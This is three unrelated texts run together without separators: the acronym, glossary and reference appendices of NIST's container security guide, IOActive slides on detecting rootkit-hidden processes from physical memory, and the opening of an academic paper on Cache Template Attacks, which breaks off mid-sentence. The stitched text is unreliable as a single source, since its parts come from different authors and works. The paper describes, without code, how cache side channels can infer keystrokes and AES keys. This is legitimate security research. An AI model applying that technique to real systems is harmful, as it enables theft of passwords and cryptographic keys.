• Draft SP 800- 155, BIOS Integrity Measurement Guidelines  
 
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
46 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Appendix C —Acronyms and Abbreviations 
Selected acronyms and abbreviations used in th is paper  are defined below. 
AES  Advanced Encryption  Standard  
API Application Programming Interface  
AUFS  Advanced Multi -Layered Unification Filesystem  
BIOS  Basic Input/Output System  
BYOD  Bring Your Own Device  
cgroup  Control Group  
CIS Center for Internet Security  
CMVP  Cryptographic Module Validation Program  
CVE  Common Vulnerabilities and Exposures  
CVSS  Common Vulnerability Scoring System  
DevOps  Development and Operations  
DNS  Domain Name System  
FIPS  Federal Information Processing Standards  
FIRST  Forum for Incident Response and Security Teams  
FISMA  Federal Information Security Modernization Act  
FOIA  Freedom of Information Act  
GB Gigabyte  
I/O Input/Output  
IP Internet Protocol  
IPS Intrusion Prevention System  
IT Information Technology  
ITL Information Technology Laboratory  
LXC  Linux Container  
MAC  Mandatory Access Control  
NIST  National Institute of Standards and Technology  
NTFS  NT File System  
OMB  Office of Management and Budget  
OS Operating System  
PIV Personal Identity Verification  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
47 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 RTM  Root of Trust for Measurement  
SDN  Software -Defined Networking  
seccomp  Secure Computing  
SIEM  Security Information and Event Management  
SP Special Publication  
SQL  Structured Query Language  
SSH Secure Shell  
SSL Secure Sockets Layer  
TLS Transport Layer Security  
TPM  Trusted Platform Module  
URI Uniform Resource Identifier  
US United States  
USCIS  United States Citizenship and Immigration Services  
VM Virtual Machine  
VPN  Virtual Private Network  
WAF  Web Application Firewall  
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
48 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Appendix D —Glossary 
Application 
virtualization  A form of virtualization that exposes a single shared operating system 
kernel to multiple discrete application instances, each of which is kept 
isolated from all others on the host.  
Base layer  The underlying layer of an image upon which all other components are 
added. 
Container  A method for packaging and securely running an application within an 
application virtualization environment . Also known as an application 
container or  a server application container.  
Container runtime  The environment for each container; comprised of binaries coordinating 
multiple operating system components that isolate resources and resource 
usage for running containers . 
Container -specific 
operating system  A minimalistic host operating system explicitly designed to only run 
containers.  
Filesystem 
virtualization  A form of virtualization that allows multiple containers to share the same 
physical storage  without the ability to access or alter the storage of other 
containers.  
General -purpose 
operating system  A host operating system that ca n be used to run many kinds of 
applications, not just applications in containers.  
Host operating 
system  The operating system kernel shared by multiple applications within an 
application virtualization architecture.  
Image  A package that contains all the files required to run a container.  
Isolation  The ability to keep multiple instances of software separated so that each 
instance only sees and can affect itself.  
Microservice A set of containers that work together to compose an application.  
Namespace 
isolation  A form of isolation that limits which resources a container may interact 
with.  
Operating system 
virtualization  A virtual implementation of the operating system  interface that can be 
used to run applications written for the s ame operating system . [from [1]] 
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
49 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Orchestrator  A tool that enables DevOps personas or automation working on their 
behalf to pull images from registries, deploy those images into containers, 
and manage the running containers. Orchestrators are also responsible for 
monitoring container resource consumption, job  execution, and machine 
health  across hosts.  
Overlay network A software -defined networking component included in most orchestrators 
that can be used to isolate communication between applications that share 
the same physical network.  
Registry  A service that allows developers to easily store images as they are created , 
tag and catalog images for identification and version control to aid in 
discovery and reuse,  and find and download images that others have 
created.  
Resource 
allocation  A mechanism for  limiting how much of a host’s resources a given 
container can consume.  
Virtual machine  A simulated environment created by virtualization. [from [1]] 
Virtualization  The simulation of the software and/or hardware upon which other 
software runs. [from [1]] 
  
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
50 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 Appendix E —References  
[1] NIST Special Publication (SP) 800 -125, Guide to Security for Full Virtualization 
Technologies , National Institute of Standards and Technology, Gaithersburg, 
Maryland, January 2011, 35pp. https://doi.org/10.6028/NIST.SP.800- 125.  
[2] Docker, https://www.docker.com/  
[3] rkt, https://coreos.com/rkt/   
[4] CoreOS  Container Linux , https://coreos.com/os/docs/latest   
[5] Project Atomic, http://www.projectatomic.io   
[6] Google Container -Optimized OS, https://cloud.google.com/container -optimized -
os/docs/   
[7] Open Container Init iative Daemon (OCID), https://github.com/kubernetes -
incubator/cri -o 
[8] Jenkins, https://jenkins.io   
[9] TeamCity, https://www.jetbrains.com/teamcity/   
[10] Amazon EC2 Container Registry (ECR), https://aws.amazon.com/ecr/  
[11] Docker Hub, https://hub.docker.com/   
[12] Docker Trusted Registry, https://hub.docker.com/r/docker/dtr/   
[13] Quay Container Registry, https://quay.io   
[14] Kubernetes, https://kubernetes.io/  
[15] Apache Mesos, http://mesos.apache.org/  
[16] Docker Swarm , https://github.com/docker/swarm  
[17] NIST Special Publication (SP) 800-154, Guide to Data -Centric System Threat 
Modeling (Draft) , National Institute of Standards and Technology, Gaithersburg, 
Maryland, March 2016, 25pp. https://csrc.nist.gov/publications/detail/sp/800-
154/draft .   
[18] Common Vulnerability Scoring System v3.0: Specification Document , Forum for 
Incident Response and Security Teams (FIRST). 
https://www.first.org/cvss/specification -document .   
NIST SP 800-190  APPLICATION CONTAINER SECURITY GUIDE 
    
51 
This publication is available free of charge from: http s://doi.org/10.6028/ NIST.SP.800 -190 
 [19] NIST Special Publication (SP) 800 -111, Guide to Storage Encryption Technologies 
for End User Devices, National Institute of Standards  and Technology, Gaithersburg, 
Maryland, November 2007, 40pp. https://doi.org/10.6028/NIST.SP.800- 111.  
[20] CIS Docker Benchmark, Center for Internet Security (CIS). 
https://www.cisecurity.org/benchmark/docker/ .  
[21] Security Enhanced Linux (SELinux), https://selinuxproject.org/page/Main_Page    
[22] AppArmor, http://wiki.apparmor.net/index.php/Main_Page   
[23] NIST Special Publication (SP) 800 -123, Guide to General Server Security , National 
Institute of Standards and Technology, Gaithersburg, Maryland, July 2008, 53pp. 
https://doi.org/10.6028/NIST.SP.800- 123  
[24] NIST Special Publication (SP) 800-164, Guidelines on Hardware -Rooted Security in 
Mobile Devices (Draft) , National Institute of Standards and Technology, 
Gaithersburg, Maryland, October 2012, 33pp. 
https://csrc.nist.gov/publications/detail/sp/800 -164/draft .  
[25] NIST Special Publicati on (SP) 800-147, BIOS Protection Guidelines , National 
Institute of Standards and Technology, Gaithersburg, Maryland, April 2011, 26pp. 
https://doi.org/10.6028/NIST.SP.800- 147.  
[26] NIST Special Publ ication (SP) 800-155, BIOS Integrity Measurement Guidelines 
(Draft) , National Institute of Standards and Technology, Gaithersburg, Maryland, 
December 2011, 47pp. https://csrc.nist.g ov/publications/detail/sp/800 -155/draft .  
[27] NIST Internal Report (IR) 7904, Trusted Geolocation in the Cloud: Proof of Concept 
Implementation, National Institute of Standards and Technology, Gaithersburg, 
Maryland, December 2015, 59 pp. https://doi.org/10.6028/NIST.IR.7904.   
[28] NIST Special Publication (SP) 800 -61 Revision 2 , Computer Security Incident 
Handling Guide , National Institute of Standards and Technology, Gaithersburg, 
Maryland, August 2012, 79 pp. https://doi.org/10.6028/NIST.SP.800- 61r2.  
[29] NIST Special Publication (SP) 800 -53 Revision 4, Security and Privacy Controls for 
Federal Information Systems and Organizations , National Institute of Standards and 
Technology, Gaithersburg, Maryland, April 2013 (including updates as of January 
15, 2014), 460pp. https://doi.org/10.6028/NIST.SP.800- 53r4. 
[30] Framework for Improving Critical Infrastructure Cybersecurity Version 1.0 , 
National Institute of Standards and Technology,  Gaithersburg, Maryland, February 
12, 2014. https://www.nist.gov/document -3766 . 
 IOActive, Inc. Copyright ©2014 .  All Rights Reserved.  
Killing the rootkit - perfect physical 
memory process detection  
Shane Macaulay  
Director of Incident Readiness  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Perfect? Sort of...  
•Typical Rootkit/APT  method for hiding processes  
–Unlink kernel structures “DKOM”  
 
•New 64bit detection  
–System/Platform independent  
–Linux/BSD/Windows/ARM64/ADM64  
•Ports on the way  
 
•Works by  analyzing physical memory & properties of 
MMU Virtual Memory system  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Ideals  
•As best as possible, figure out all running code  
•We focus on establishing our understanding through real 
world targets: Hypervisor monitored guests.  
 
•Combine protection pillars  
1.physical memory traversal (hardware/structure layout ) 
2.structure analysis (logical OS interaction)  
3.integrity  checking (white listed)  
 
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Use a VM  
•Hypervisor reduces bare metal pains  
 
–Establishes verifiability of device state (i.e. not worried 
about platform attacks e.g. BIOS/firmware/UEFI ) 
 
–Games in fault handler  do not work on snapshot, even 
just extracting physical memory can be hard  
 
–Protection from virtualized  (Dino Dai Zovi), that is 
serious/ obvious impact to performance when  nested . 
 
 
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
What’s a Process?  
•A Process is an address space configuration  
–The configuration “file” is the page table  
–A container  for threads which are executed on a CPU.  
–Threads share address space.  
–Hard to know if you have all processes.  
 
•Wait, wait?  
–Can’t I inject a library/thread to an existing process?  
•Code overwrite or injection  is an integrity issue  
–Hash Check  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
In Memory Process  Detection  
•Dumping memory is a pain physically  
•Scanning VS.  List traversal  
•Scanning  
–Can be very slow  
–Tends to be high assurance  
 
•Link/Pointer Traversal  
–Easily confused (DKOM attacks)  
–Super Fast !  
 
 
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Process Detection  
•Volatility  to the rescue! 
https://code.google.com/p/volatility/wiki/CommandRefer
ence#psxview  
–It compares the following logical  identifiers:  
•PsActiveProcessHead  linked list  
•EPROCESS pool scanning  
•ETHREAD pool scanning (then it references the owning 
EPROCESS)  
•PspCidTable  
•Csrss.exe handle table  
•Csrss.exe internal linked list (unavailable Vista+)  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Takahiro Haruyama  -- April 2014, discuss his BH 
Europe 2012 talk with respect to Abort Factors . 
 

IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
64bit Process Detection  
•Earlier presentation for kernel code  
–E.g. CSW14 Diff CPU Page table & Logical kernel objects 
(to detect hidden kernel modules, “rootkit revealer”)  
 
•Also uses page tables “Locating x86 paging structures in 
memory images” 
https://www.cs.umd.edu/~ ksaur/saurgrizzard.pdf  
–Karla Saur, Julian B. Grizzard  
•New process detection technique is faster  - single pass  
–Similar to “ pmodump ”, enhanced with 64bit & additional 
checks (64bit scan has much more verifiability)  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
64bit Process Detection Integrity  
•Not easily attacked  
–Many modifications result in BSOD  
 
–Able to extract candidate memory for integrity checking of 
memory pages to fully qualify  
 
–Always room to grow with respect to countermeasures 
and performance  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
X64 Self MAP  
Self pointer  
 A pointer to self is very powerful   
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
X64 Kernel Virtual Address Space  
http://www.codemachine.com/article_x64kvas.html  
Start  End Size Description  Notes  
FFFF0800`00000000  FFFFF67F`FFFFFFFF  238TB  Unused System Space  WIN9600 NOW  USE & CAN 
CONTAIN +X  AREAS  
FFFFF680`00000000  FFFFF6FF`FFFFFFFF  512GB  PTE Space  -X used to be executable 
Win7  
FFFFF700`00000000  FFFFF77F`FFFFFFFF  512GB  HyperSpace  8.1 seems  to have cleaned up 
here, 9200 had 1 +X page  
FFFFF780`00000000  FFFFF780`00000FFF  4K Shared System Page  
FFFFF780`00001000  FFFFF7FF`FFFFFFFF  512GB -4K System Cache Working Set  
FFFFF 800`00000000  FFFFF87F`FFFFFFFF  512GB  Initial Loader Mappings  Large Page (2MB) allocations  
FFFFF880`00000000  FFFFF89F`FFFFFFFF  128GB  Sys PTEs  
FFFFF8a0`00000000  FFFFF8bF`FFFFFFFF  128GB  Paged Pool Area  
FFFFF900`00000000  FFFFF97F`FFFFFFFF  512GB  Session Space  
FFFFF980`00000000  FFFFFa70`FFFFFFFF  1TB Dynamic Kernel VA Space  
FFFFFa80`00000000  *nt!MmNonPagedPoolStart -1 6TB Max  PFN Database  
*nt!MmNonPagedPoolStart  *nt!MmNonPagedPoolEnd  512GB Max  Non-Paged Pool  DEFAULT NO  EXECUTE  
FFFFFFFF`FFc00000  FFFFFFFF`FFFFFFFF  4MB HAL and Loader Mappings  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Self Map detection  Windows AMD64  
•Self Map exists for each process (not only kernel:)  
•Examining a page table - !process 0 0  dirbase /cr3 
 
     !dq 7820e000   
#7820e000 00800000`60917 867 
   [physical addr]                [value]  
 
!dq 7820e000+ 0xf68  
#7820e f68 80000000 `7820e 863 
     ^-- current PFN found --^         (PFN FTW)  
 
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
PFN FTW Trick! (or Defensive exploit!!)  
#7820e f68 80000000 `7820e 863 
                   ^---------- ^ 
              64Bit is a more powerful check  
Valid PFN will be bounded by system 
physical memory constraints  
 
Valid self map address  will always increase 
from previous  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
These are the BITs your looking for...  
typedef  struct  _HARDWARE_PTE {  
    ULONGLONG Valid : 1 ;   Indicates hardware or software handling (mode 1&2)  
    ULONGLONG Write : 1;  
    ULONGLONG Owner : 1;  
    ULONGLONG WriteThrough  : 1; 
    ULONGLONG CacheDisable  : 1; 
    ULONGLONG Accessed : 1;  
    ULONGLONG Dirty : 1;  
    ULONGLONG LargePage  : 1;   Mode2  
    ULONGLONG Global : 1;  
    ULONGLONG CopyOnWrite  : 1; 
    ULONGLONG Prototype : 1;     Mode2  
    ULONGLONG reserved0 : 1;  
    ULONGLONG PageFrameNumber  : 36;            PFN, always incrementing (mode 1&2)  
    ULONGLONG reserved1 : 4;  
ULONGLONG SoftwareWsIndex  : 11;    Mode2  
ULONGLONG NoExecute  : 1; 
} HARDWARE_PTE, *PHARDWARE_PTE;  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Base PageTable  offsets  
Below example of 512 -way page table  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
These are the OFFSETS your looking for.  
•512 way Table (512 * 8 = 0x1000, a page)  
–PFN Offset 0 configured and valid bit  
–PFN Offset 0x1ed Point’s to self and valid bit  
•This allows us to identify *current position  
 
•Mode2 has more checks for typical page table  
•Mode1 is for heightened assurance  
–Both work together to extract PFN & MEMORY_RUN 
gaps  
–http:// blockwatch.ioactive.com/MProcDetect.cs   
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Self Map Detection Attacks  
•Attacks against performance  
–If we de -tune performance we can validate spoof entries 
and various malformed cases  
–Windows zero’s memory quickly (no exiting processes, so 
far:) 
•!ed [physical] can be done to assess evasive 
techniques  
–Simply destroying self map results in BSOD!!   
–Looking for feedback testing  to identify better more 
comprehensive PTE flag checks ( edge cases, missed 
tables or extra checks)  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Implementation (basically  in 1 line)  

IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Example execution (. vmem  starts @0 offset), .DMP (0x2000+) 
or other autodetect  header offset  
 

IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Detected Memory Runs  
•Round value by offset to find gap size, adjust to 
automate memory  run detection  
–Takahiro Haruyama  blog post on related issue (large 
memory) and also memory run detection issues from 
logical sources  
•*previous slide, detecting gap, when offset changes;  
–ROUND_UP(0xb4b56000,  0x40000000) = first run end 
0xc0000..  
– ROUND_DOWN(0x1181f1000,  0x40000000)  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Detect  processes of guests from host 
dump  
•A host memory dump will include page tables for every 
guest  VM process as well as host process entries  
–Lots of room to grow here, deep integration with 
HyperVisor  page mapping data may be straight forward  
•E.g. parsing of MMInternal.h  / MMPAGESUBPOOL in 
VirtualBox   
•Issues  
–Hypervisor may not wipe when moving an instance or 
after it’s been suspended (ghost processes)  
•I’d rather detect ghosts than fail  
•Nested paging not a problem  
 
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Skew is evident for guest instances.  An typical kernel PFN is observed  
(187) as the first (large jump 0x2.. ->0x4...) in a range of skewed diff 
values (another layer of decoding to adjust, similar to what happens when 
snapshot is requested and disk memory is serialized)  
Initial values reflective of host system, consistent Diff values  
Final host processes identifiable by Diff realignment  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Self Map trick in Linux  
•Virtual Memory in the IA -64 Linux Kernel  
–Stephane Eranian  and David Mosberger  
•4.3.2 Virtually -mapped linear page tables  
“linear page tables are not very practical when implemented 
in physical memory”  
“The trick that makes this possible is to place a self -mapping 
entry in the global directory .” 
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Issues, Considerations Caveats  
•Use a hypervisor – secure the guest/host  (very hardened 
host)  
–Hypervisor escape == you’re a high value to risk nice exploit  
•Probably NOT YOU!  
•BluePill  type attacks, hopeful still to consider (but perf hit of 
nesting should be obvious)  
•SefMap  Detection relies on page table.  
–Maybe “ no paging process” – (same  as x86 paging paper)  
–TSS considerations, monitor other tables with stacks?  
–Remote DMA?  
•Please no!  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Summary  
•Always  use a VM  
–At least simplify memory dumping  
•Use ProcDetect   
–Have fun detecting!  
–Process hiding rootkit is dead  
–64bits helps peace of mind  
•We can detect a process anywhere (host, guest, 
nested, on the network (probably ) 
•RoP & other attacks? Check out CSW14 and DC22 
slides  
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Attention Wikipedia editors DKOM    
 “Not only is this very difficult to..” 
 
We have a high assurance capability, applicable cross 64bit 
platforms ( linux/freebsd  also arm64, etc...) , for process 
detection.  
 
Even though threads are distinct execution contexts, the 
property of shared MMU configuration establishes a 
verification capability that OS kernel object manipulation can 
not effect.  
 
IOActive, Inc. Copyright ©2014 .  All Rights Reserved . 
Thank you & Questions  
•I hope I referenced earlier works sufficiently, this topic is 
broad and expansive, thanks to the many security 
professionals who  analyze memory, reverse -engineered, 
dove deep and discussed their understanding.  
•References, follow embedded links and their links  
 
 Cache Template Attacks:
Automating Attacks on Inclusive Last-Level Caches
Daniel Gruss ,Raphael Spreitzer , and Stefan Mangard
Graz University of Technology, Austria
Abstract
Recent work on cache attacks has shown that CPU
caches represent a powerful source of information leak-
age. However, existing attacks require manual identifi-
cation of vulnerabilities, i.e., data accesses or instruction
execution depending on secret information. In this pa-
per, we present Cache Template Attacks . This generic
attack technique allows us to profile and exploit cache-
based information leakage of any program automatically,
without prior knowledge of specific software versions or
even specific system information. Cache Template At-
tacks can be executed online on a remote system without
any prior offline computations or measurements.
Cache Template Attacks consist of two phases. In the
profiling phase, we determine dependencies between the
processing of secret information, e.g., specific key inputs
or private keys of cryptographic primitives, and specific
cache accesses. In the exploitation phase, we derive the
secret values based on observed cache accesses. We il-
lustrate the power of the presented approach in several
attacks, but also in a useful application for developers.
Among the presented attacks is the application of Cache
Template Attacks to infer keystrokes and—even more
severe—the identification of specific keys on Linux and
Windows user interfaces. More specifically, for lower-
case only passwords, we can reduce the entropy per char-
acter from log2(26) =4.7 to 1 .4 bits on Linux systems.
Furthermore, we perform an automated attack on the T-
table-based AES implementation of OpenSSL that is as
efficient as state-of-the-art manual cache attacks.
1 Introduction
Cache-based side-channel attacks have gained increas-
ing attention among the scientific community. First, in
terms of ever improving attacks against cryptographic
Original publication in the Proceedings of the 24th Annual
USENIX Security Symposium (USENIX Security ’15) [15].implementations, both symmetric [4, 6, 17, 40, 42, 54] as
well as asymmetric cryptography [3, 7, 9, 55], and sec-
ond, in terms of developing countermeasures to prevent
these types of attacks [32, 35]. Recently, Yarom and
Falkner [56] proposed the Flush+Reload attack, which
has been successfully applied against cryptographic im-
plementations [3, 18, 23]. Besides the possibility of
attacking cryptographic implementations, Yarom and
Falkner pointed out that their attack might also be used
to attack other software as well, for instance, to collect
keystroke timing information. However, no clear indica-
tion is given on how to exploit such vulnerabilities with
their attack. A similar attack has already been suggested
in 2009 by Ristenpart et al. [45], who reported being
able to gather keystroke timing information by observ-
ing cache activities on an otherwise idle machine.
The limiting factor of all existing attacks is that sophis-
ticated knowledge about the attacked algorithm or soft-
ware is necessary, i.e., access to the source code or even
modification of the source code [7] is required in order
to identify vulnerable memory accesses or the execution
of specific code fragments manually.
In this paper, we make use of the Flush+Reload at-
tack [56] and present the concept of Cache Template At-
tacks ,1a generic approach to exploit cache-based vul-
nerabilities in any program running on architectures with
shared inclusive last-level caches. Our attack exploits
four fundamental concepts of modern cache architectures
and operating systems.
1. Last-level caches are shared among all CPUs.
2. Last-level caches are inclusive, i.e., all data which
is cached within the L1 and L2 cache must also be
cached in the L3 cache. Thus, any modification of
the L3 cache on one core immediately influences
the cache behavior of all other cores.
3. Cache lines are shared among different processes.
4. The operating system allows programs to map any
1The basic framework can be found at https://github.com/
IAIK/cache_template_attacks .
other program binary or library, i.e., code and static
data, into their own address space.
Based on these observations, we demonstrate how to per-
form Cache Template Attacks on any program automat-
ically in order to determine memory addresses which
are accessed depending on secret information or specific
events. Thus, we are not only able to attack crypto-
graphic implementations, but also any other event, e.g.,
keyboard input, which might be of interest to an attacker.
We demonstrate how to use Cache Template Attacks
to derive keystroke information with a deviation of less
than 1 microsecond from the actual keystroke and an
accuracy of almost 100%. With our approach, we are
not only able to infer keystroke timing information, but
even to infer specific keys pressed on the keyboard, both
for GTK-based Linux user interfaces and Windows user
interfaces. Furthermore, all attacks to date require so-
phisticated knowledge of the attacked software and the
executable itself. In contrast, our technique can be ap-
plied to any executable in a generic way. In order to
demonstrate this, we automatically attack the T-table-
based AES [10, 36] implementation of OpenSSL [38].
Besides demonstrating the power of Cache Template
Attacks to exploit cache-based vulnerabilities, we also
discuss how this generic concept supports developers in
detecting cache-based information leaks within their own
software, including third party libraries. Based on the in-
sights we gained during the development of the presented
concept, we also present possible countermeasures to
mitigate specific types of cache attacks.
Outline. The remaining paper is organized as follows.
In Section 2, we provide background information on
CPU caches, shared memory, and cache attacks in gen-
eral. We describe Cache Template Attacks in Section 3.
We illustrate the basic idea on an artificial example pro-
gram in Section 4 and demonstrate Cache Template At-
tacks against real-world applications in Section 5. In
Section 6, we discuss countermeasures against cache at-
tacks in general. Finally, we conclude in Section 7.
2 Background and Related Work
In this section, we give a basic introduction to the con-
cept of CPU caches and shared memory. Furthermore,
we provide a basic introduction to cache attacks.
2.1 CPU Caches
The basic idea of CPU caches is to hide memory ac-
cesses to the slow physical memory by buffering fre-
quently used data in a small and fast memory. Today,
most architectures employ set-associative caches, mean-
ing that the cache is divided into multiple cache sets andeach cache set consists of several cache lines (also called
ways). An index is used to map specific memory loca-
tions to the sets of the cache memory.
We distinguish between virtually indexed and physi-
cally indexed caches, which derive the index from the
virtual or physical address, respectively. In general, vir-
tually indexed caches are considered to be faster than
physically indexed caches. However, the drawback of
virtually indexed caches is that different virtual addresses
mapping to the same physical address are cached in dif-
ferent cache lines. In order to uniquely identify a spe-
cific cache line within a cache set, so-called tags are
used. Again, caches can be virtually tagged or physically
tagged. A virtual tag has the same drawback as a virtual
index. Physical tags, however, are less expensive than
physical indices as they can be computed simultaneously
with the virtual index.
In addition, there is a distinction between inclusive and
exclusive caches. On Intel systems, the L3 cache is an
inclusive cache, meaning that all data within the L1 and
L2 caches are also present within the L3 cache. Further-
more, the L3 cache is shared among all cores. Due to
the shared L3 cache, executing code or accessing data on
one core has immediate consequences for all other cores.
This is the basis for the Flush+Reload [56] attack as de-
scribed in Section 2.3.
Our test systems (Intel Core i5-2/3 CPUs) have
two 32 KB L1 caches—one for data and one for
instructions—per core, a unified L2 cache of 256 KB,
and a unified L3 cache of 3 MB (12 ways) shared among
all cores. The cache-line size is 64 bytes for all caches.
2.2 Shared Memory
Operating systems use shared memory to reduce memory
utilization. For instance, libraries used by several pro-
grams are shared among all processes using them. The
operating system loads the libraries into physical mem-
ory only once and maps the same physical pages into the
address space of each process.
The operating system employs shared memory in sev-
eral more cases. First, when forking a process, the mem-
ory is shared between the two processes. Only when
the data is modified, the corresponding memory regions
are copied. Second, a similar mechanism is used when
starting another instance of an already running program.
Third, it is also possible for user programs to request
shared memory using system calls like mmap .
The operating system tries to unify these three cate-
gories. On Linux, mapping a program file or a shared
library file as a read-only memory with mmap results
in sharing memory with all these programs, respec-
tively programs using the same shared library or pro-
gram binary. This is also possible on Windows using the
2
LoadLibrary function. Thus, even if a program is stat-
ically linked, its memory is shared with other programs
which execute or map the same binary.
Another form of shared memory is content-based page
deduplication. The hypervisor or operating system scans
the physical memory for pages with identical content.
All mappings to identical pages are redirected to one
of the pages while the other pages are marked as free.
Thus, memory is shared between completely unrelated
processes and even between processes running in differ-
ent virtual machines. When the data is modified by one
process, memory is duplicated again. These examples
demonstrate that code as well as static data can be shared
among processes, even without their knowledge. Never-
theless, page deduplication can enhance system perfor-
mance and besides the application in cloud systems, it is
also relevant in smaller systems like smartphones.
User programs can retrieve information on their virtual
and physical memory using operating-system services
like/proc/<pid>/maps on Linux or tools like vmmap
on Windows. The list of mappings typically includes all
loaded shared-object files and the program binary.
2.3 Cache Attacks
Cache attacks are a specific type of side-channel attacks
that exploit the effects of the cache memory on the execu-
tion time of algorithms. The first theoretical attacks were
mentioned by Kocher [29] and Kelsey et al. [27]. Later
on, practical attacks for DES were proposed by Page [42]
as well as Tsunoo et al. [51]. In 2004, Bernstein [4]
proposed the first time-driven cache attack against AES.
This attack has been investigated quite extensively [37].
A more fine-grained attack has been proposed by Per-
cival [43], who suggested to measure the time to access
all ways of a cache set. As the access time correlates with
the number of occupied cache ways, an attacker can de-
termine the cache ways occupied by other processes. At
the same time, Osvik et al. [40] proposed two fundamen-
tal techniques that allow an attacker to determine which
specific cache sets have been accessed by a victim pro-
gram. The first technique is Evict+Time, which consists
of three steps. First, the victim program is executed and
its execution time is measured. Afterwards, an attacker
evicts one specific cache set and finally measures the ex-
ecution time of the victim again. If the execution time
increased, the cache set was probably accessed during
the execution.
The second technique is Prime+Probe, which is sim-
ilar to Percival’s attack. During the Prime step, the at-
tacker occupies specific cache sets. After the victim pro-
gram has been scheduled, the Probe step is used to deter-
mine which cache sets are still occupied.
Later on, Gullasch et al. [17] proposed a significantlymore powerful attack that exploits the fact that shared
memory is loaded into the same cache sets for differ-
ent processes. While Gullasch et al. attacked the L1
cache, Yarom and Falkner [56] presented an improve-
ment called Flush+Reload that targets the L3 cache.
Flush+Reload relies on the availability of shared mem-
ory and especially shared libraries between the attacker
and the victim program. An attacker constantly flushes
a cache line using the clflush instruction on an ad-
dress within the shared memory. After the victim has
been scheduled, the attacker measures the time it takes
to reaccess the same address again. The measured time
reveals whether the data has been loaded into the cache
by reaccessing it or whether the victim program loaded
the data into the cache before reaccessing. This allows
the attacker to determine the memory accesses of the vic-
tim process. As the L3 cache is shared among all cores,
it is not necessary to constantly interrupt the victim pro-
cess. Instead, both processes run on different cores while
still working on the same L3 cache. Furthermore, the
L3 cache is a unified inclusive cache and, thus, even al-
lows to determine when a certain instruction is executed.
Because of the size of the L3 cache, there are signifi-
cantly fewer false negative cache-hit detections caused
by evictions. Even though false positive cache-hit detec-
tions (as in Prime+Probe) are not possible because of the
shared-memory-based approach, false positive cache hits
can still occur if data is loaded into the cache acciden-
tally (e.g., by the prefetcher). Nevertheless, applications
of Flush+Reload have been shown to be quite reliable
and powerful, for example, to detect specific versions of
cryptographic libraries [24], to revive supposedly fixed
attacks (e.g., Lucky 13) [25] as well as to improve at-
tacks against T-table-based AES implementations [18].
As shared memory is not always available between
different virtual machines in the cloud, more recent cache
attacks use the Prime+Probe technique to perform cache
attacks across virtual machine borders. For example, Ira-
zoqui et al. [21] demonstrated a cross-VM attack on a
T-Table-based AES implementation and Liu et al. [33]
demonstrated a cross-VM attack on GnuPG. Both attacks
require manual identification of exploitable code and
data in targeted binaries. Similarly, Maurice et al. [34]
built a cache-index-agnostic cross-VM covert channel
based on Prime+Probe.
Simultaneous to our work, Oren et al. [39] devel-
oped a cache attack from within sandboxed JavaScript
to attack user-specific data like network traffic or mouse
movements. Contrary to existing attack approaches, we
present a general attack framework to exploit cache vul-
nerabilities automatically. We demonstrate the effective-
ness of this approach by inferring keystroke informa-
tion and, for comparison reasons, by attacking a T-table-
based AES implementation.
3
3 Cache Template Attacks
Chari et al. [8] presented template attacks as one of
the strongest forms of side-channel attacks. First, side-
channel traces are generated on a device controlled by the
attacker. Based on these traces, the template—an exact
model of signal and noise—is generated. A single side-
channel trace from an identical device with unknown key
is then iteratively classified using the template to derive
the unknown key.
Similarly, Brumley and Hakala [7] described cache-
timing template attacks to automatically analyze and ex-
ploit cache vulnerabilities. Their attack is based on
Prime+Probe on the L1 cache and, thus, needs to run on
the same core as the spy program. Furthermore, they
describe a profiling phase for specific operations exe-
cuted in the attacked binary, which requires manual work
or even modification of the attacked software. In con-
trast, our attack only requires an attacker to know how
to trigger specific events in order to attack them. Subse-
quently, Brumley and Hakala match these timing tem-
plates against the cache timing observed. In contrast,
we match memory-access templates against the observed
memory accesses.
Inspired by their work we propose Cache Template At-
tacks . The presented approach of Cache Template At-
tacks allows the exploitation of any cache vulnerability
present in any program on any operating system executed
on architectures with shared inclusive last-level caches
and shared memory enabled. Cache Template Attacks
consist of two phases: 1) a profiling phase, and 2) an ex-
ploitation phase. In the profiling phase, we compute a
Cache Template matrix containing the cache-hit ratio on
an address given a specific target event in the binary un-
der attack. The exploitation phase uses this Cache Tem-
plate matrix to infer events from cache hits.
Both phases rely on Flush+Reload and, thus, attack
code and static data within binaries. In both phases the
attacked binary is mapped into read-only shared mem-
ory in the attacker process. By accessing its own vir-
